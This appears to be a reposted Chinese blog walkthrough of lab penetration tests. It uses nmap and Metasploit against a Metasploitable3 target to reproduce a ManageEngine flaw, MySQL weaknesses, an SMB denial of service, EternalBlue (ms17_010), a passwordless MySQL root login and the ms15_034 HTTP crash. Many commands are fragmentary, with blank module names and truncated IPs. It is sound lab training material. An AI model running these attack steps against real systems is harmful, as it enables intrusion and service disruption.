| 关键词: 渗透 攻击 windows 漏洞 扫描 模块 192.168 进行 端口 复现 |
1、攻击windows服务器漏洞 用nmap对网段进行扫描nmap -sP 192.168. 在进行IP扫描 发现Windows服务器漏洞 步骤: msfconsole---进入渗透模块 search manageengine-------搜索渗透模块 search reverse_http---------搜索http渗透模块 use ![]() set rhosts 192.168. set rport 8022 set LpORT 8080 run -----------------设置攻击目标地址,攻击目标端口,回连的端口号: 2、MYSQL数据库漏洞 nmap 192.168.-----扫描端口漏洞 步骤: msfconsole-------进入渗透模式 search mysql-------扫描数据库渗透版本 use show options set rhosts 192.168.--------设置攻击端口号 set payload run 3、拒绝服务攻击漏洞: 使用nmap 192.168. 对端口号进行扫描发现漏洞 步骤: msfconsole-------进入渗透模式 ![]() search dos/smb/smb-------搜索渗透版本 use ![]() show options-------- ![]() set rhosts 192.168.--------设置攻击端口号 run-----渗透 4.永恒之蓝漏洞复现 漏洞描述: Eternalblue通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。 影响版本: 目前已知受影响的Windows 版本包括但不限于:WindowsNT,Windows2000、Windows XP、Windows 2003、Windows Vista、Windows 7、Windows 8,Windows 2008、Windows 2008 R2、Windows Server 2012 SP0。 复现环境: 攻击机:Kali2020.3(IP:192.168.88.143) 靶机:Metasploitable3Win2k8 (IP:192.168.88.140) 复现过程:
2、打开MSF 在终端输入如下命令打开MSF终端: 搜索ms17_010模块 这里可以得到几个工具,其中 执行扫描模块 执行ms17_010攻击模块 5.MySQL弱密码登录: 1、在kali上执行mysql –h 192.168.26.123 –u root 2、登录成功,进入MySQL系统 3、测试效果: 6.http(ms15_034漏洞) 进入msf模块 查看要设置的东西show options 设置攻击ip 攻击前 ![]() 攻击后,我的是蓝屏1秒后,跳转到立即重启界面 ssh测试 ![]() 开启端口转发 查看情况 在kali上尝试连接(rdesktop IP) |
| 本文出处: https://www.toutiao.com/a6974379625942204966/ |
|
声明:文章版权归原作者所有 部分文章转自互联网 如有侵权请联系
[邮箱地址] 删除
|